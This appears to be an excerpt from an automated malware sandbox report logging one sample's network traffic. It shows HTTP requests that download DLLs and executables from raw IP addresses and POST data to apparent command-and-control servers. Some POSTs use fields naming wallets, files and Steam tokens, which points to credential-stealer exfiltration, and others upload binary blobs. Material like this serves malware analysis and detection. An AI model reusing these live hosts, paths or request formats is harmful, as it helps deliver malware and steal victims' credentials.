20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3
                              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 37 36 32 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1017625001&unit=246122658369
                              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /hLfzXsaqNtoEGyaUtOMJ1734514745?argument=bUbC3wV0kP2YsIRM1734614448 HTTP/1.1Host: home.fivetk5vt.topAccept: */*
                              Source: global trafficHTTP traffic detected: GET /files/unique3/random.exe HTTP/1.1Host: 31.41.244.11
                              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEBKKECBGIIJJKECGIJEHost: 185.215.113.206Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 37 36 32 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1017626001&unit=246122658369
                              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJKFBAAAFHJEBFIEGIDHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4a 4b 46 42 41 41 41 46 48 4a 45 42 46 49 45 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 63 37 61 34 34 63 38 66 35 30 32 30 31 63 63 30 62 39 33 66 38 61 37 33 66 31 36 36 65 62 31 63 35 39 32 66 38 66 30 36 38 63 36 36 64 62 39 36 36 33 64 30 38 66 64 65 37 66 38 61 64 63 65 65 66 66 31 35 64 30 66 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4b 46 42 41 41 41 46 48 4a 45 42 46 49 45 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4b 46 42 41 41 41 46 48 4a 45 42 46 49 45 47 49 44 2d 2d 0d 0a Data Ascii: ------JJJKFBAAAFHJEBFIEGIDContent-Disposition: form-data; name="token"5c7a44c8f50201cc0b93f8a73f166eb1c592f8f068c66db9663d08fde7f8adceeff15d0f------JJJKFBAAAFHJEBFIEGIDContent-Disposition: form-data; name="message"wallets------JJJKFBAAAFHJEBFIEGID--
                              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFIDGDBGCAAFIDHIJKEHHost: 185.215.113.206Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 49 44 47 44 42 47 43 41 41 46 49 44 48 49 4a 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 63 37 61 34 34 63 38 66 35 30 32 30 31 63 63 30 62 39 33 66 38 61 37 33 66 31 36 36 65 62 31 63 35 39 32 66 38 66 30 36 38 63 36 36 64 62 39 36 36 33 64 30 38 66 64 65 37 66 38 61 64 63 65 65 66 66 31 35 64 30 66 0d 0a 2d 2d 2d 2d 2d 2d 41 46 49 44 47 44 42 47 43 41 41 46 49 44 48 49 4a 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 41 46 49 44 47 44 42 47 43 41 41 46 49 44 48 49 4a 4b 45 48 2d 2d 0d 0a Data Ascii: ------AFIDGDBGCAAFIDHIJKEHContent-Disposition: form-data; name="token"5c7a44c8f50201cc0b93f8a73f166eb1c592f8f068c66db9663d08fde7f8adceeff15d0f------AFIDGDBGCAAFIDHIJKEHContent-Disposition: form-data; name="message"files------AFIDGDBGCAAFIDHIJKEH--
                              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJEHIJEBKEBFBFHIIDHIHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 45 48 49 4a 45 42 4b 45 42 46 42 46 48 49 49 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 63 37 61 34 34 63 38 66 35 30 32 30 31 63 63 30 62 39 33 66 38 61 37 33 66 31 36 36 65 62 31 63 35 39 32 66 38 66 30 36 38 63 36 36 64 62 39 36 36 33 64 30 38 66 64 65 37 66 38 61 64 63 65 65 66 66 31 35 64 30 66 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 45 48 49 4a 45 42 4b 45 42 46 42 46 48 49 49 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 45 48 49 4a 45 42 4b 45 42 46 42 46 48 49 49 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 45 48 49 4a 45 42 4b 45 42 46 42 46 48 49 49 44 48 49 2d 2d 0d 0a Data Ascii: ------HJEHIJEBKEBFBFHIIDHIContent-Disposition: form-data; name="token"5c7a44c8f50201cc0b93f8a73f166eb1c592f8f068c66db9663d08fde7f8adceeff15d0f------HJEHIJEBKEBFBFHIIDHIContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------HJEHIJEBKEBFBFHIIDHIContent-Disposition: form-data; name="file"------HJEHIJEBKEBFBFHIIDHI--
                              Source: global trafficHTTP traffic detected: GET /files/lolz/random.exe HTTP/1.1Host: 31.41.244.11
                              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGDBKFBAKFBFHIECFBFIHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 44 42 4b 46 42 41 4b 46 42 46 48 49 45 43 46 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 63 37 61 34 34 63 38 66 35 30 32 30 31 63 63 30 62 39 33 66 38 61 37 33 66 31 36 36 65 62 31 63 35 39 32 66 38 66 30 36 38 63 36 36 64 62 39 36 36 33 64 30 38 66 64 65 37 66 38 61 64 63 65 65 66 66 31 35 64 30 66 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 42 4b 46 42 41 4b 46 42 46 48 49 45 43 46 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 42 4b 46 42 41 4b 46 42 46 48 49 45 43 46 42 46 49 2d 2d 0d 0a Data Ascii: ------DGDBKFBAKFBFHIECFBFIContent-Disposition: form-data; name="token"5c7a44c8f50201cc0b93f8a73f166eb1c592f8f068c66db9663d08fde7f8adceeff15d0f------DGDBKFBAKFBFHIECFBFIContent-Disposition: form-data; name="message"ybncbhylepme------DGDBKFBAKFBFHIECFBFI--
                              Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 37 36 32 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1017627001&unit=246122658369
                              Source: global trafficHTTP traffic detected: GET /files/dodo/random.exe HTTP/1.1Host: 31.41.244.11
                              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAFIEHIEGDHIDGDGHDHJHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 63 37 61 34 34 63 38 66 35 30 32 30 31 63 63 30 62 39 33 66 38 61 37 33 66 31 36 36 65 62 31 63 35 39 32 66 38 66 30 36 38 63 36 36 64 62 39 36 36 33 64 30 38 66 64 65 37 66 38 61 64 63 65 65 66 66 31 35 64 30 66 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 44 48 4a 2d 2d 0d 0a Data Ascii: ------DAFIEHIEGDHIDGDGHDHJContent-Disposition: form-data; name="token"5c7a44c8f50201cc0b93f8a73f166eb1c592f8f068c66db9663d08fde7f8adceeff15d0f------DAFIEHIEGDHIDGDGHDHJContent-Disposition: form-data; name="message"wkkjqaiaxkhb------DAFIEHIEGDHIDGDGHDHJ--
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 37 36 32 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1017628001&unit=246122658369
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fivetk5vt.topAccept: */*Content-Length: 463Content-Type: multipart/form-data; boundary=------------------------VrpZkuoWC6a4vg7Q6mctZTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 56 72 70 5a 6b 75 6f 57 43 36 61 34 76 67 37 51 36 6d 63 74 5a 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 57 69 7a 61 6e 69 6b 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 21 7b da 9e 24 11 e5 87 20 5d 19 cf 4c c9 b6 b6 0b 5e f3 26 fb d7 ba 4b 62 3a df c1 bc b3 97 c7 ce bb d8 6b cc 44 d4 b4 a6 b1 fc 8a 76 f8 0a 85 39 df 2c 13 cb 3d 0a 6a d0 98 b3 28 43 f4 1b ef 05 10 67 a1 9a 35 60 da e3 85 48 ce 89 4d 13 48 47 f6 cb 9f 5c 48 f0 09 6b ed 26 6d cc 1a 00 fe d1 6d 03 13 16 1a 2e 2f 7b b8 89 ae a2 f2 8f 2e 0f ed 39 b0 89 21 f1 b5 b8 a7 ec 62 09 96 67 1c e8 cb 34 b5 1c 77 8a 02 fb 64 e2 58 85 c4 a7 fd 24 d6 0b 0d 43 b7 9b fa 80 99 e2 7e b1 5f 4e dc d7 dd 01 e9 21 d9 a0 59 32 f9 45 f6 ef b2 03 91 97 9f 82 10 bc 67 4e 04 78 6c 48 81 d7 72 87 dd 0e 32 1d 1b 31 96 62 32 f8 98 97 ae 5c 8d ea 95 13 39 27 e4 7c 4d 7c bf fb ec 6c 11 55 9b 67 9b 3c 77 f8 5a e2 6c 40 1a 6e 3e f0 fe 95 51 cf c5 f6 19 d2 1c ab 48 a0 8c 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 56 72 70 5a 6b 75 6f 57 43 36 61 34 76 67 37 51 36 6d 63 74 5a 54 2d 2d 0d 0a Data Ascii: --------------------------VrpZkuoWC6a4vg7Q6mctZTContent-Disposition: form-data; name="file"; filename="Wizanik.bin"Content-Type: application/octet-stream!{$ ]L^&Kb:kDv9,=j(Cg5`HMHG\Hk&mm./{.9!bg4wdX$C~_N!Y2EgNxlHr21b2\9'|M|lUg<wZl@n>QH--------------------------VrpZkuoWC6a4vg7Q6mctZT--
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                              Source: global trafficHTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fivetk5vt.topAccept: */*Content-Length: 84517Content-Type: multipart/form-data; boundary=------------------------p7i7u3jGe3SOdObRymfEtUData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 70 37 69 37 75 33 6a 47 65 33 53 4f 64 4f 62 52 79 6d 66 45 74 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 42 69 62 6f 6e 6f 64 6f 62 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a cd 4f 47 d6 06 56 95 b3 4e eb 81 d3 14 d5 7f b2 05 54 7c 6f 82 f2 a9 19 a5 8a 81 fb 54 9f e3 a6 2d 42 ba 28 25 ce da 08 de 07 a3 46 a3 2e a2 bd 4d 99 0a 7d b1 f3 08 00 fb a8 6f 66 ed a9 7b 83 43 77 d0 a3 90 f4 6e b7 14 bc 95 c2 10 91 fd 65 7c 6f 76 fe e0 f5 6a 87 bd 9e 6b 34 5f d4 1c 03 37 ac 0d 82 61 da 08 7c 53 6f 38 4b 6e 0b e7 59 34 ef 93 f4 09 48 1d 4a 91 e0 16 6f c7 48 b8 7e 9e 18 8a 60 b4 03 1c 66 da 99 3b ce 41 d8 a6 4a ff 16 c6 34 c4 18 a4 df 05 c0 17 c7 01 a7 c6 e2 36 e4 d6 a8 b4 7e 44 6a 64 3b d8 f5 2e ee f7 99 ad cf c4 ea 63 8c c9 61 37 5e 82 f1 3c 6e c3 27 10 ce 12 88 ce a3 ef 30 01 ba f7 67 d8 e6 fa cd ac 97 06 ce e4 3f fd cf 5a cf 2b 5f 7d 7f 96 3f 56 07 87 ac 15 bc 58 00 98 7c fa 11 69 6f f3 57 11 bc f7 53 41 c0 99 92 27 ae 90 b8 ff 7b d8 7a 68 4a c3 ad 4d eb e3 13 5e 8f 45 8a f1 13 cc 3f 96 c8 0b c1 10 6c c2 0a 7b f2 ce ac 70 ad 8d 77 81 aa 75 9e 0e 49 94 5e e1 f8 29 5d ea 83 95 cc 2b 24 5c d1 49 01 e4 aa 21 6b 74 18 f9 01 04 7d 7d 7a 52 3a 06 3d 54 22 c3 06 58 89 6b 4d b3 e5 2f e6 54 20 99 b1 bf 40 a5 da c3 84 96 fb c5 56 82 0a e8 90 fa 7a 56 e1 21 5f aa d2 1f a8 ba 1b bb 12 b9 4d 73 c8 f8 8f b1 d7 ba d1 e9 9a 53 53 ea c2 73 39 ce ba f7 be 34 6f c2 9d fc 92 b9 8b 83 54 15 e5 3b 39 82 6a 3c df e9 7b c4 84 52 c0 cd 01 73 00 db 18 c1 39 a3 d0 58 60 b0 cc 52 1c c5 74 46 cc 42 91 85 7e 3d aa 96 02 d6 7b fe 58 55 08 d3 a4 ab 66 50 94 f3 88 d9 7c 3b bd c8 d2 07 72 1a 84 ee 41 7e 3c 4b 41 18 0c cb 25 bf 69 7e 5a 78 59 7f 31 2b bc bd c1 36 99 fd 50 d2 fe eb a4 13 fd 88 aa 03 c7 01 a0 08 8a 62 35 fc ba 5e 20 19 e7 90 14 2a d8 e3 79 d0 6c d8 7d 1d 54 08 86 5c 18 26 e0 86 5c 26 1b 22 57 de a9 12 48 2f fc 2b 77 22 9a 71 25 df d3 34 75 95 52 60 32 fb c7 a4 bd cc a9 19 6c 91 50 51 a9 2b aa e7 29 b0 3b 07 f3 3c 9e 83 70 d0 19 35 a5 00 5f ae 33 ef 09 ad 5d c8 34 3e 2a f3 b3 b4 60 ed 1a 3b b8 59 6c 48 d8 ce 92 4e 80 f0 24 a8 e7 96 3f 52 60 0c 59 6d 69 0a 89 ff f0 74 32 fc 81 ea 8c 73 7f d5 89 9e 70 f1 c7 54 38 8f 18 a8 22 27 d0 be 3f 5b 50 56 84 42 c5 9a 45 08 cb 96 49 7c 73 1c 5d fc 53 64 71 d4 47 94 9e d9 33 b2 c8 5e 70 38 a2 78 74 1c 82 19 99 df 91 17 48 77 34 fc c5 2c 56 d0 56 8b 73 c3 45 89 65 f4 72 2e 61 e3 c8 28 38 2e 1f 60 28 c8 ab d3 82 bf ea e8 f1 00 7a ac 79 50 fb 59 72 50 f9 b8 c8 f7 1b 3a 57 88 06 1e 2a d6 53 a2 00 52 e0 6b 59 d6 a3 92 6e cc f2 46 75 27 df 25 1b 96 0e
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fivetk5vt.topAccept: */*Content-Length: 23410Content-Type: multipart/form-data; boundary=------------------------rH3WDtdKAHfKI76Nide4X8Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 72 48 33 57 44 74 64 4b 41 48 66 4b 49 37 36 4e 69 64 65 34 58 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 51 69 6c 6f 71 6f 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 9f 87 29 2b b4 64 e3 c1 9b 89 b6 a9 ef 52 2b 18 5b 93 01 ef 48 2d fa aa 17 d7 49 3b bc ee cd 2b 7b 36 57 2b 82 b8 16 78 12 86 6e e9 b8 ac 2c a4 91 08 7c a8 db 47 dd 40 b7 0e 27 42 c5 17 9f 4f 0b 0d f1 2b bd 88 fc e5 97 ee 69 23 6c 66 93 4d 17 5a 48 a8 97 72 a4 fe 56 1d a9 20 9d fc 9d 0b ad 5c 0a de dc e6 51 a0 64 82 9a 85 56 d0 1b d6 ae 6d 45 3d 7a 3d c8 5c 5a 3e 34 d0 11 b6 f0 26 27 43 d6 09 02 d4 d2 97 b1 38 c0 61 10 8e 36 ae 07 c8 28 67 e8 b9 90 a1 21 5d 17 0f e1 1e 6d 6c 93 7c ec df 0a bc 49 6e 96 fe 90 23 6c ca 71 8a 93 7d 93 ef b6 8d ce 24 c6 83 1b 88 c4 c8 7d 3b f2 e7 f3 37 93 34 30 ed 7e 0b 25 60 b6 c9 2e 39 f9 0f bb 64 7c 8f b5 7d c9 e2 00 8c 89 aa 12 2c 9d 8e 41 31 9b 27 21 69 24 02 1d 78 20 83 8e ee 02 58 1b f7 0e 26 6f bb f4 23 53 86 51 1a 9f bb 35 7e f1 5d 8a 33 74 ed 22 ad 4d 70 ab 46 cc b6 33 4a d2 71 1c 83 77 50 b2 c8 3f 13 69 60 dc ac c2 db e9 da 71 85 02 7c 99 92 24 9e ca fd 52 35 c4 0b a0 1e 34 ec 11 1c 90 2a f5 c9 d5 bf 8f a7 16 c1 f4 da 21 28 97 18 a2 63 9f ed 03 d5 50 9a 6e 76 b5 18 75 2f e5 34 0c 9e 58 04 79 62 13 e4 cd ef 81 db f6 2b 0c c1 8b d8 9f 6c e1 b3 fa 01 e1 e1 e2 f7 f1 ef 62 d7 24 b7 92 0f b5 f6 ad 8f cc e3 78 ec df 46 7c 00 3d 8b bc 31 dc be be 20 d3 32 af 12 07 03 fe 10 0f de 08 0a 64 de 75 7a 53 79 d4 38 7d 5d 2e ad 40 ea 05 a7 78 1e 15 55 0b fe 2b 25 4a 01 0f c6 34 5c 12 e1 38 8c 04 53 be c9 f3 70 63 20 b4 79 1e 8d 0d 79 09 71 8f 27 46 aa c4 91 66 67 63 9d ef a2 37 57 ef fb 9f 82 79 1a bf fd 88 7e e9 42 d0 59 df 9b d0 25 af 4a a5 ee c2 81 ba d2 bb 4e 1d e9 4b 19 34 23 06 f3 02 64 c8 2c 95 7e 4b d0 df c1 6f 89 93 25 5e 21 d3 2b 9a 3e b0 68 a3 b1 e6 60 6f eb c8 3d 68 91 9d d0 ce 77 af 04 d0 22 da 11 11 b4 34 98 11 e5 42 51 af c8 89 4d 1e 08 56 e6 3c 06 f1 94 d4 60 bc 1f 7c b7 ff 1e cb c6 44 fd ec fd 27 94 ab 23 79 62 33 9d 14 f5 11 1a 57 a0 a5 46 e0 b3 28 96 83 c6 67 49 a7 28 62 1e bd 47 79 bd 4e 25 21 27 7a 66 94 7f 5c ea 32 b5 32 4e cb 23 a1 f1 4f 1e af fb e5 5e dd f7 ac aa ba 8d fc 5d 52 29 91 b0 ef b4 ae b9 2f d1 56 60 9c 48 15 e9 77 f7 d4 a9 1b 4a f8 ea 77 df 3f e3 0d 34 a0 ee 5b c8 f2 f5 9a 13 18 3c 4f cd c8 8f e2 0a c7 46 db 52 bb bd 25 7e ae fe a6 87 e3 6a 43 64 d8 48 3c 73 78 d1 7e c3 22 92 8d 3e 0a a9 98 b4 31 f8 74 bc f2 1f cb 34 57 be 0d 5d f4 06 22 83 5d 51 5d b6 e4 c2 aa 45 22 f9 6b 79 d7 2d 18 